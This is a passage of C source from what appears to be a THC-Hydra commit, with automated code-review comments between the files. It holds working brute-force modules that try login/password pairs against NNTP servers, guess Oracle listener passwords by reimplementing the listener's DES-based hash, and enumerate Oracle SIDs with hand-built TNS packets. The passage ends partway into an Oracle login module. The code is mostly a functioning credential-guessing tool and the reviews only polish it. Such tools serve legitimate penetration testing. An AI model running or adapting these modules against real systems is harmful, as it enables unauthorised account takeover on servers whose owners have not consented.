pass = empty;
while (i > 0 && hydra_data_ready(s) > 0)
i = hydra_recv(s, buffer, 300);
switch (nntp_auth_mechanism) {
case AUTH_LOGIN:
sprintf(buffer, "AUTHINFO SASL LOGIN\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (buf == NULL || strstr(buf, "383") == NULL) {
hydra_report(stderr, "[ERROR] NNTP LOGIN AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
strcpy(buffer2, login);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%.250s\r\n", buffer2);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (buf == NULL || strstr(buf, "383") == NULL) {
hydra_report(stderr, "[ERROR] NNTP LOGIN AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
strcpy(buffer2, pass);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%.250s\r\n", buffer2);
break;
case AUTH_PLAIN:
sprintf(buffer, "AUTHINFO SASL PLAIN\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (buf == NULL || strstr(buf, "383") == NULL) {
hydra_report(stderr, "[ERROR] NNTP PLAIN AUTH : %s\n", buf);
free(buf);
return 3;
}
free(buf);
memset(buffer, 0, sizeof(buffer));
sasl_plain(buffer, login, pass);
sprintf(buffer, "%.250s\r\n", buffer);
break;
#ifdef LIBOPENSSL
case AUTH_CRAMMD5:{
int rc = 0;
char *preplogin;
rc = sasl_saslprep(login, SASL_ALLOW_UNASSIGNED, &preplogin);
if (rc) {
return 3;
}
sprintf(buffer, "AUTHINFO SASL CRAM-MD5\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
//get the one-time BASE64 encoded challenge
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (buf == NULL || strstr(buf, "383") == NULL) {
hydra_report(stderr, "[ERROR] NNTP CRAM-MD5 AUTH : %s\n", buf);
free(buf);
return 3;
}
memset(buffer, 0, sizeof(buffer));
from64tobits((char *) buffer, buf + 4);
free(buf);
memset(buffer2, 0, sizeof(buffer2));
sasl_cram_md5(buffer2, pass, buffer);
sprintf(buffer, "%s %.250s", preplogin, buffer2);
hydra_tobase64((unsigned char *) buffer, strlen(buffer), sizeof(buffer));
sprintf(buffer, "%.250s\r\n", buffer);
free(preplogin);
}
break;
case AUTH_DIGESTMD5:{
sprintf(buffer, "AUTHINFO SASL DIGEST-MD5\r\n");
if (hydra_send(s, buffer, strlen(buffer), 0) < 0)
return 1;
//receive
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (buf == NULL || strstr(buf, "383") == NULL) {
hydra_report(stderr, "[ERROR] NNTP DIGEST-MD5 AUTH : %s\n", buf);
free(buf);
return 3;
}
memset(buffer, 0, sizeof(buffer));
from64tobits((char *) buffer, buf + 4);
free(buf);
if (verbose)
hydra_report(stderr, "DEBUG S: %s\n", buffer);
sasl_digest_md5(buffer2, login, pass, buffer, miscptr, "nntp", NULL, 0, NULL);
if (buffer2 == NULL)
return 3;
if (verbose)
hydra_report(stderr, "DEBUG C: %s\n", buffer2);
hydra_tobase64((unsigned char *) buffer2, strlen(buffer2), sizeof(buffer2));
sprintf(buffer, "%s\r\n", buffer2);
}
break;
#endif
case AUTH_NTLM:{
unsigned char buf1[4096];
unsigned char buf2[4096];
//send auth and receive challenge
buildAuthRequest((tSmbNtlmAuthRequest *) buf2, 0, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthRequest *) buf2));
sprintf(buffer, "AUTHINFO SASL NTLM %s\r\n", (char *) buf1);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (buf == NULL || strstr(buf, "383") == NULL) {
hydra_report(stderr, "[ERROR] NNTP NTLM AUTH : %s\n", buf);
free(buf);
return 3;
}
//recover challenge
from64tobits((char *) buf1, buf + 4);
free(buf);
buildAuthResponse((tSmbNtlmAuthChallenge *) buf1, (tSmbNtlmAuthResponse *) buf2, 0, login, pass, NULL, NULL);
to64frombits(buf1, buf2, SmbLength((tSmbNtlmAuthResponse *) buf2));
sprintf(buffer, "%s\r\n", (char *) buf1);
}
break;
default:{
sprintf(buffer, "AUTHINFO USER %.250s\r\n", login);
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
buf = hydra_receive_line(s);
if (buf == NULL)
return 1;
if (buf[0] != '3') {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Not an NNTP protocol or service shutdown: %s\n", buf);
free(buf);
return (3);
}
free(buf);
sprintf(buffer, "AUTHINFO PASS %.250s\r\n", pass);
}
break;
}
if (hydra_send(s, buffer, strlen(buffer), 0) < 0) {
return 1;
}
buf = hydra_receive_line(s);
if (buf == NULL)
return 1;
if (buf[0] == '2') {
hydra_report_found_host(port, ip, "nntp", fp);
hydra_completed_pair_found();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
free(buf);
hydra_completed_pair();
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 2;
}
void service_nntp(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int i = 0, run = 1, next_run = 1, sock = -1;
int myport = PORT_NNTP, mysslport = PORT_NNTP_SSL, disable_tls = 0;
char *buffer1 = "CAPABILITIES\r\n";
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(300000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
// usleep(300000);
buf = hydra_receive_line(sock);
if (buf == NULL || buf[0] != '2') { /* check the first line */
if (verbose || debug)
hydra_report(stderr, "[ERROR] Not an NNTP protocol or service shutdown: %s\n", buf);
hydra_child_exit(2);
}
free(buf);
/* send capability request */
if (hydra_send(sock, buffer1, strlen(buffer1), 0) < 0)
hydra_child_exit(2);
buf = nntp_read_server_capacity(sock);
if (buf == NULL) {
hydra_child_exit(2);
}
#ifdef LIBOPENSSL
if (!disable_tls) {
/* if we got a positive answer */
if (strstr(buf, "STARTTLS") != NULL) {
hydra_send(sock, "STARTTLS\r\n", strlen("STARTTLS\r\n"), 0);
free(buf);
buf = hydra_receive_line(sock);
/* 382 Begin TLS negotiation now */
if (buf == NULL || strstr(buf, "382") == NULL) {
if (verbose)
hydra_report(stderr, "[VERBOSE] TLS negotiation failed\n");
} else {
free(buf);
if ((hydra_connect_to_ssl(sock) == -1)) {
if (verbose)
hydra_report(stderr, "[ERROR] Can't use TLS\n");
disable_tls = 1;
run = 1;
break;
} else {
if (verbose)
hydra_report(stderr, "[VERBOSE] TLS connection done\n");
}
/* ask again capability request but in TLS mode */
if (hydra_send(sock, buffer1, strlen(buffer1), 0) < 0)
hydra_child_exit(2);
/* we asking again cause often plain and login can only
be negociate in SSL tunnel
*/
buf = nntp_read_server_capacity(sock);
if (buf == NULL) {
hydra_child_exit(2);
}
}
}
}
#endif
/*
AUTHINFO USER SASL
SASL PLAIN DIGEST-MD5 LOGIN NTLM CRAM-MD5
*/
#ifdef HAVE_PCRE
if (hydra_string_match(buf, "SASL\\s.*NTLM")) {
#else
if (strstr(buf, "NTLM") != NULL) {
#endif
nntp_auth_mechanism = AUTH_NTLM;
}
#ifdef LIBOPENSSL
#ifdef HAVE_PCRE
if (hydra_string_match(buf, "SASL\\s.*DIGEST-MD5")) {
#else
if (strstr(buf, "DIGEST-MD5") != NULL) {
#endif
nntp_auth_mechanism = AUTH_DIGESTMD5;
}
#ifdef HAVE_PCRE
if (hydra_string_match(buf, "SASL\\s.*CRAM-MD5")) {
#else
if (strstr(buf, "CRAM-MD5") != NULL) {
#endif
nntp_auth_mechanism = AUTH_CRAMMD5;
}
#endif
#ifdef HAVE_PCRE
if (hydra_string_match(buf, "SASL\\s.*PLAIN")) {
#else
if (strstr(buf, "PLAIN") != NULL) {
#endif
nntp_auth_mechanism = AUTH_PLAIN;
}
#ifdef HAVE_PCRE
if (hydra_string_match(buf, "SASL\\s.*LOGIN")) {
#else
if (strstr(buf, "LOGIN") != NULL) {
#endif
nntp_auth_mechanism = AUTH_LOGIN;
}
#ifdef HAVE_PCRE
if (hydra_string_match(buf, "AUTHINFO\\sUSER")) {
#else
if (strstr(buf, "AUTHINFO USER") != NULL) {
#endif
nntp_auth_mechanism = AUTH_CLEAR;
}
if ((miscptr != NULL) && (strlen(miscptr) > 0)) {
for (i = 0; i < strlen(miscptr); i++)
miscptr[i] = (char) toupper((int) miscptr[i]);
if (strncmp(miscptr, "USER", 4) == 0)
nntp_auth_mechanism = AUTH_CLEAR;
if (strncmp(miscptr, "LOGIN", 5) == 0)
nntp_auth_mechanism = AUTH_LOGIN;
if (strncmp(miscptr, "PLAIN", 5) == 0)
nntp_auth_mechanism = AUTH_PLAIN;
#ifdef LIBOPENSSL
if (strncmp(miscptr, "CRAM-MD5", 8) == 0)
nntp_auth_mechanism = AUTH_CRAMMD5;
if (strncmp(miscptr, "DIGEST-MD5", 10) == 0)
nntp_auth_mechanism = AUTH_DIGESTMD5;
#endif
if (strncmp(miscptr, "NTLM", 4) == 0)
nntp_auth_mechanism = AUTH_NTLM;
}
if (verbose) {
switch (nntp_auth_mechanism) {
case AUTH_CLEAR:
hydra_report(stderr, "[VERBOSE] using NNTP AUTHINFO USER mechanism\n");
break;
case AUTH_LOGIN:
hydra_report(stderr, "[VERBOSE] using NNTP LOGIN AUTH mechanism\n");
break;
case AUTH_PLAIN:
hydra_report(stderr, "[VERBOSE] using NNTP PLAIN AUTH mechanism\n");
break;
#ifdef LIBOPENSSL
case AUTH_CRAMMD5:
hydra_report(stderr, "[VERBOSE] using NNTP CRAM-MD5 AUTH mechanism\n");
break;
case AUTH_DIGESTMD5:
hydra_report(stderr, "[VERBOSE] using NNTP DIGEST-MD5 AUTH mechanism\n");
break;
#endif
case AUTH_NTLM:
hydra_report(stderr, "[VERBOSE] using NNTP NTLM AUTH mechanism\n");
break;
}
}
usleep(25000);
free(buf);
next_run = 2;
break;
case 2: /* run the cracking function */
next_run = start_nntp(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_nntp_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
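
Review bot: the capability checks from DIGEST-MD5 down to AUTHINFO USER each assign nntp_auth_mechanism in an independent `if`, so the last match wins and any server that advertises AUTHINFO USER ends up on AUTH_CLEAR regardless of what else it offers. If that precedence is intended, state it in a comment; otherwise make the sequence an else-if chain in the preferred order. The non-PCRE fallbacks such as `strstr(buf, "PLAIN")` and `strstr(buf, "LOGIN")` also match those words anywhere in the reply rather than only in a SASL capability line, so the two build variants can pick different mechanisms for the same server. Minor: the `-m` handling re-evaluates strlen(miscptr) on every loop iteration, while hydra-oracle-listener.c in this commit uses strupper(miscptr) for the same job, and the verbose `switch` has no default case.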

339
hydra-oracle-listener.c Normal file

@ -0,0 +1,339 @@
/*
david:
PASSWORDS_LISTENER in listener.ora can be in clear or in plain mode,
this module support the 2 modes, use -m PLAIN or -m CLEAR on the cmd
line. Default is plain (oracle 10 uses it).
Thanks to Marcell for the plain mode analysis available
at http://marcellmajor.com/frame_listenerhash.html
*/
#include "hydra-mod.h"
#ifndef LIBOPENSSL
#include <stdio.h>
void dummy_oracle_listener() {
printf("\n");
}
#else
#include <sasl.h>
#include <openssl/des.h>
#define HASHSIZE 17
extern char *HYDRA_EXIT;
char *buf;
unsigned char *hash;
int sid_mechanism = AUTH_PLAIN;
int initial_permutation(unsigned char **result, char *p_str, int *sz) {
int k = 0;
int i = strlen(p_str);
char *buff;
//expand the string with zero so that length is a multiple of 4
while ((i % 4) != 0) {
i = i + 1;
}
*sz = 2 * i;
if ((buff = malloc(i)) == NULL) {
hydra_report(stderr, "[ERROR] Can't allocate memory\n");
return 1;
}
memset(buff, 0, i);
strncpy(buff, p_str, strlen(p_str));
//swap the order of every byte pair
for (k = 0; k < i; k += 2) {
char bck = buff[k + 1];
buff[k + 1] = buff[k];
buff[k] = bck;
}
//convert to unicode
if ((*result = malloc(2 * i)) == NULL) {
hydra_report(stderr, "[ERROR] Can't allocate memory\n");
free(buff);
return 1;
}
memset(*result, 0, 2 * i);
for (k = 0; k < i; k++) {
(*result)[2 * k] = buff[k];
}
free(buff);
return 0;
}
int ora_hash(unsigned char **orahash, unsigned char *buf, int len) {
int i;
if ((*orahash = malloc(HASHSIZE)) == NULL) {
hydra_report(stderr, "[ERROR] Can't allocate memory\n");
return 1;
}
for (i = 0; i < 8; i++) {
sprintf(((char *) *orahash) + i * 2, "%02X", buf[len - 8 + i]);
}
return 0;
}
int convert_byteorder(unsigned char **result, int size) {
int i = 0;
char *buff;
if ((buff = malloc(size)) == NULL) {
hydra_report(stderr, "[ERROR] Can't allocate memory\n");
return 1;
}
memcpy(buff, *result, size);
while (i < size) {
buff[i + 0] = (*result)[i + 3];
buff[i + 1] = (*result)[i + 2];
buff[i + 2] = (*result)[i + 1];
buff[i + 3] = (*result)[i + 0];
i += 4;
}
memcpy(*result, buff, size);
free(buff);
return 0;
}
int ora_descrypt(unsigned char **rs, unsigned char *result, int siz) {
int i = 0;
char lastkey[8];
des_key_schedule ks1;
unsigned char key1[8] = { 0x01, 0x23, 0x45, 0x67, 0x89, 0xAB, 0xCD, 0xEF };
unsigned char ivec1[] = { 0, 0, 0, 0, 0, 0, 0, 0 };
unsigned char *desresult;
memset(ivec1, 0, sizeof(ivec1));
if ((desresult = malloc(siz)) == NULL) {
hydra_report(stderr, "[ERROR] Can't allocate memory\n");
return 1;
}
des_key_sched((C_Block *) key1, ks1);
des_ncbc_encrypt(result, desresult, siz, ks1, &ivec1, DES_ENCRYPT);
for (i = 0; i < 8; i++) {
lastkey[i] = desresult[siz - 8 + i];
}
des_key_sched((C_Block *) lastkey, ks1);
memset(desresult, 0, siz);
memset(ivec1, 0, sizeof(ivec1));
des_ncbc_encrypt(result, desresult, siz, ks1, &ivec1, DES_ENCRYPT);
if ((*rs = malloc(siz)) == NULL) {
hydra_report(stderr, "[ERROR] Can't allocate memory\n");
free(desresult);
return 1;
}
memcpy(*rs, desresult, siz);
return 0;
}
int ora_hash_password(char *pass) {
// secret hash function comes here, and written to char *hash
int siz = 0;
unsigned char *desresult;
unsigned char *result;
char buff[strlen(pass) + 5];
memset(buff, 0, sizeof(buff));
//concatenate Arb string and convert the resulting string to uppercase
snprintf(buff, sizeof(buff), "Arb%s", pass);
strupper(buff);
if (initial_permutation(&result, buff, &siz)) {
hydra_report(stderr, "[ERROR] ora_hash_password: in initial_permutation\n");
return 1;
}
if (convert_byteorder(&result, siz)) {
hydra_report(stderr, "[ERROR] ora_hash_password: in convert_byteorder\n");
return 1;
}
if (ora_descrypt(&desresult, result, siz)) {
hydra_report(stderr, "[ERROR] ora_hash_password: in DES crypt\n");
return 1;
}
free(result);
if (ora_hash(&result, desresult, siz)) {
hydra_report(stderr, "[ERROR] ora_hash_password: in extracting Oracle hash\n");
return 1;
}
memcpy(hash, result, HASHSIZE);
free(desresult);
free(result);
return 0;
}
int start_oracle_listener(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
unsigned char tns_packet_begin[22] = {
"\x00\x00\x01\x00\x00\x00\x01\x36\x01\x2c\x00\x00\x08\x00\x7f\xff\x86\x0e\x00\x00\x01\x00"
};
unsigned char tns_packet_end[32] = {
"\x00\x3a\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x09\x94\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00"
};
char *empty = "";
char *pass;
char connect_string[200];
char buffer2[260];
int siz = 0;
memset(connect_string, 0, sizeof(connect_string));
memset(buffer2, 0, sizeof(buffer2));
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
if (sid_mechanism == AUTH_PLAIN) {
if ((hash = malloc(HASHSIZE)) == NULL) {
hydra_report(stderr, "[ERROR] Can't allocate memory\n");
return 1;
}
memset(hash, 0, HASHSIZE);
if (ora_hash_password(pass)) {
hydra_report(stderr, "[ERROR] generating Oracle hash\n");
free(hash);
return 1;
}
pass = (char *) hash;
}
snprintf(connect_string, sizeof(connect_string), "(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=))(COMMAND=reload)(PASSWORD=%s)(SERVICE=)(VERSION=169869568)))", pass);
if (hash != NULL)
free(hash);
if (verbose)
hydra_report(stderr, "[VERBOSE] using connectiong string: %s\n", connect_string);
siz = 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end) + strlen(connect_string);
if (siz > 255) {
buffer2[0] = 1;
buffer2[1] = siz - 256;
} else {
buffer2[1] = siz;
}
memcpy(buffer2 + 2, (char *) tns_packet_begin, sizeof(tns_packet_begin));
siz = strlen(connect_string);
if (siz > 255) {
buffer2[2 + sizeof(tns_packet_begin)] = 1;
buffer2[1 + 2 + sizeof(tns_packet_begin)] = siz - 256;
} else {
buffer2[1 + 2 + sizeof(tns_packet_begin)] = siz;
}
memcpy(buffer2 + 2 + sizeof(tns_packet_begin) + 2, (char *) tns_packet_end, sizeof(tns_packet_end));
memcpy(buffer2 + 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end), connect_string, strlen(connect_string));
if (hydra_send(s, buffer2, 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end) + strlen(connect_string), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
if (verbose || debug)
hydra_report(stderr, "[VERBOSE] Server answer: %s\n", buf);
if (strstr(buf, "ERR=0") != NULL) {
hydra_report_found_host(port, ip, "oracle-listener", fp);
hydra_completed_pair_found();
} else
hydra_completed_pair();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_oracle_listener(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_ORACLE, mysslport = PORT_ORACLE_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
if ((miscptr != NULL) && (strlen(miscptr) > 0)) {
strupper(miscptr);
if (strncmp(miscptr, "CLEAR", 5) == 0)
sid_mechanism = AUTH_CLEAR;
}
if (verbose) {
switch (sid_mechanism) {
case AUTH_CLEAR:
hydra_report(stderr, "[VERBOSE] using SID CLEAR mechanism\n");
break;
case AUTH_PLAIN:
hydra_report(stderr, "[VERBOSE] using SID PLAIN mechanism\n");
break;
}
}
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(300000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
if (verbose || debug)
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
/* run the cracking function */
next_run = start_oracle_listener(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
case 4:
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_oracle_listener_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
#endif
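
Review bot: ora_descrypt() leaks desresult on its success path: the buffer is copied into a freshly allocated *rs with `memcpy(*rs, desresult, siz);` and the function returns 0 without freeing it, so every password attempt in PLAIN mode loses siz bytes. Either hand the buffer over directly (`*rs = desresult;`) or free it after the copy. The early returns in ora_hash_password() have the same problem: `result` is not freed when convert_byteorder() or ora_descrypt() fails, and `desresult` is not freed when ora_hash() fails. In start_oracle_listener() the global `hash` is freed but left pointing at the freed block; set it to NULL after `free(hash)` so the later `if (hash != NULL)` test stays meaningful. Minor: `char buff[strlen(pass) + 5]` puts an input-sized array on the stack, and the verbose message reads "connectiong string".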

151
hydra-oracle-sid.c Normal file

@ -0,0 +1,151 @@
/*
david:
module used to check for a valid oracle SID
ORCL and XE are a good start, but you should
find a big list on the Internet
*/
#include "hydra-mod.h"
#ifndef LIBOPENSSL
#include <stdio.h>
void dummy_oracle_sid() {
printf("\n");
}
#else
#include <openssl/des.h>
#define HASHSIZE 16
extern char *HYDRA_EXIT;
char *buf;
unsigned char *hash;
int start_oracle_sid(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
/*
PP is the packet length
XX is the length of connect data
PP + tns_packet_begin + XX + tns_packet_end
*/
unsigned char tns_packet_begin[22] = {
"\x00\x00\x01\x00\x00\x00\x01\x36\x01\x2c\x00\x00\x08\x00\x7f\xff\x86\x0e\x00\x00\x01\x00"
};
unsigned char tns_packet_end[32] = {
"\x00\x3a\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x09\x94\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00"
};
char *empty = "";
char *login;
char connect_string[200];
char buffer2[260];
int siz = 0;
memset(connect_string, 0, sizeof(connect_string));
memset(buffer2, 0, sizeof(buffer2));
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
snprintf(connect_string, sizeof(connect_string), "(DESCRIPTION=(CONNECT_DATA=(SID=%s)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=)))(ADDRESS=(PROTOCOL=tcp)(HOST=%s)(PORT=%d)))", login,
hydra_address2string(ip), port);
siz = 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end) + strlen(connect_string);
if (siz > 255) {
buffer2[0] = 1;
buffer2[1] = siz - 256;
} else {
buffer2[1] = siz;
}
memcpy(buffer2 + 2, (char *) tns_packet_begin, sizeof(tns_packet_begin));
siz = strlen(connect_string);
if (siz > 255) {
buffer2[2 + sizeof(tns_packet_begin)] = 1;
buffer2[1 + 2 + sizeof(tns_packet_begin)] = siz - 256;
} else {
buffer2[1 + 2 + sizeof(tns_packet_begin)] = siz;
}
memcpy(buffer2 + 2 + sizeof(tns_packet_begin) + 2, (char *) tns_packet_end, sizeof(tns_packet_end));
memcpy(buffer2 + 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end), connect_string, strlen(connect_string));
if (hydra_send(s, buffer2, 2 + sizeof(tns_packet_begin) + 2 + sizeof(tns_packet_end) + strlen(connect_string), 0) < 0) {
return 1;
}
if ((buf = hydra_receive_line(s)) == NULL)
return 1;
//if no error reported. it should be a resend packet type 00 08 00 00 0b 00 00 00, 4 is refuse
if ((strstr(buf, "ERR=") == NULL) && (buf[4] != 4)) {
hydra_report_found_host(port, ip, "oracle-sid", fp);
hydra_completed_pair_found();
} else
hydra_completed_pair();
free(buf);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return 3;
return 1;
}
void service_oracle_sid(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
int run = 1, next_run = 1, sock = -1;
int myport = PORT_ORACLE, mysslport = PORT_ORACLE_SSL;
hydra_register_socket(sp);
if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) == 0)
return;
while (1) {
switch (run) {
case 1: /* connect and service init function */
if (sock >= 0)
sock = hydra_disconnect(sock);
// usleep(300000);
if ((options & OPTION_SSL) == 0) {
if (port != 0)
myport = port;
sock = hydra_connect_tcp(ip, myport);
port = myport;
} else {
if (port != 0)
mysslport = port;
sock = hydra_connect_ssl(ip, mysslport);
port = mysslport;
}
if (sock < 0) {
hydra_report(stderr, "[ERROR] Child with pid %d terminating, can not connect\n", (int) getpid());
hydra_child_exit(1);
}
/* run the cracking function */
next_run = start_oracle_sid(sock, ip, port, options, miscptr, fp);
break;
case 3: /* clean exit */
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(0);
return;
case 4:
if (sock >= 0)
sock = hydra_disconnect(sock);
hydra_child_exit(2);
return;
default:
hydra_report(stderr, "[ERROR] Caught unknown return code, exiting!\n");
hydra_child_exit(0);
}
run = next_run;
}
}
int service_oracle_sid_init(char *ip, int sp, unsigned char options, char *miscptr, FILE * fp, int port) {
// called before the childrens are forked off, so this is the function
// which should be filled if initial connections and service setup has to be
// performed once only.
//
// fill if needed.
//
// return codes:
// 0 all OK
// -1 error, hydra will exit, so print a good error message here
return 0;
}
#endif
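
Review bot: the success test `(strstr(buf, "ERR=") == NULL) && (buf[4] != 4)` in start_oracle_sid() treats a binary reply as a C string. The comment directly above it gives the expected resend packet as 00 08 00 00 0b 00 00 00, which starts with a NUL byte, so for any reply whose first byte is 0x00 strstr() sees an empty string and the ERR= check cannot fire, and buf[4] is read without knowing the reply is at least five bytes long. Receive with a call that returns the byte count (hydra_recv() is used that way in hydra-pcanywhere.c in this commit), check the length before indexing, and search for "ERR=" with a length-bounded scan. Separately, `#include <openssl/des.h>`, HASHSIZE and the global `hash` are never used in this file, so the `#ifndef LIBOPENSSL` guard around the whole module looks unnecessary; and snprintf() into connect_string[200] truncates silently, which would send a malformed descriptor for a long SID or host instead of reporting it.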

191
hydra-oracle.c Normal file

@ -0,0 +1,191 @@
/*
david: code is based on SNORT spo_database.c
tested with :
-instantclient_10_2 on Oracle 10.2.0
-instantclient-basic-linux.*-11.2.0.3.0.zip + instantclient-sdk-linux.*-11.2.0.3.0.zip
on Oracle 9i and on Oracle 11g
*/
#include "hydra-mod.h"
#ifndef LIBORACLE
void dummy_oracle() {
printf("\n");
}
#else
#include <oci.h>
#include <sys/types.h>
extern char *HYDRA_EXIT;
OCIEnv *o_environment;
OCISvcCtx *o_servicecontext;
OCIBind *o_bind;
OCIError *o_error;
OCIStmt *o_statement;
OCIDefine *o_define;
text o_errormsg[512];
sb4 o_errorcode;
void print_oracle_error(char *err) {
if (verbose) {
OCIErrorGet(o_error, 1, NULL, &o_errorcode, o_errormsg, sizeof(o_errormsg), OCI_HTYPE_ERROR);
fprintf(stderr, "[ERROR] Oracle_error: %s - %s\n", o_errormsg, err);
}
}
int start_oracle(int s, char *ip, int port, unsigned char options, char *miscptr, FILE * fp) {
char *empty = "";
char *login, *pass, buffer[200], sid[100];
if (strlen(login = hydra_get_next_login()) == 0)
login = empty;
if (strlen(pass = hydra_get_next_password()) == 0)
pass = empty;
strncpy(sid, miscptr, sizeof(sid) - 1);
sid[sizeof(sid) - 1] = 0;
snprintf(buffer, sizeof(buffer), "//%s:%d/%s", hydra_address2string(ip), port, sid);
/*
To use the Easy Connect naming method, PHP must be linked with Oracle 10g or greater Client libraries.
The Easy Connect string for Oracle 10g is of the form: [//]host_name[:port][/service_name].
With Oracle 11g, the syntax is: [//]host_name[:port][/service_name][:server_type][/instance_name].
Service names can be found by running the Oracle utility lsnrctl status on the database server machine.
The tnsnames.ora file can be in the Oracle Net search path, which includes $ORACLE_HOME/network/admin
and /etc. Alternatively set TNS_ADMIN so that $TNS_ADMIN/tnsnames.ora is read. Make sure the web
daemon has read access to the file.
*/
if (OCIInitialize(OCI_DEFAULT, NULL, NULL, NULL, NULL)) {
print_oracle_error("OCIInitialize");
return 4;
}
if (OCIEnvInit(&o_environment, OCI_DEFAULT, 0, NULL)) {
print_oracle_error("OCIEnvInit");
return 4;
}
if (OCIEnvInit(&o_environment, OCI_DEFAULT, 0, NULL)) {
print_oracle_error("OCIEnvInit 2");
return 4;
}
if (OCIHandleAlloc(o_environment, (dvoid **) & o_error, OCI_HTYPE_ERROR, (size_t) 0, NULL)) {
print_oracle_error("OCIHandleAlloc");
return 4;
}
if (OCILogon(o_environment, o_error, &o_servicecontext, (const OraText *) login, strlen(login), (const OraText *) pass, strlen(pass), (const OraText *) buffer, strlen(buffer))) {
OCIErrorGet(o_error, 1, NULL, &o_errorcode, o_errormsg, sizeof(o_errormsg), OCI_HTYPE_ERROR);
//database: oracle_error: ORA-01017: invalid username/password; logon denied
//database: oracle_error: ORA-12514: TNS:listener does not currently know of service requested in connect descriptor
//database: oracle_error: ORA-28000: the account is locked
//Failed login attempts is set to 10 by default
if (verbose) {
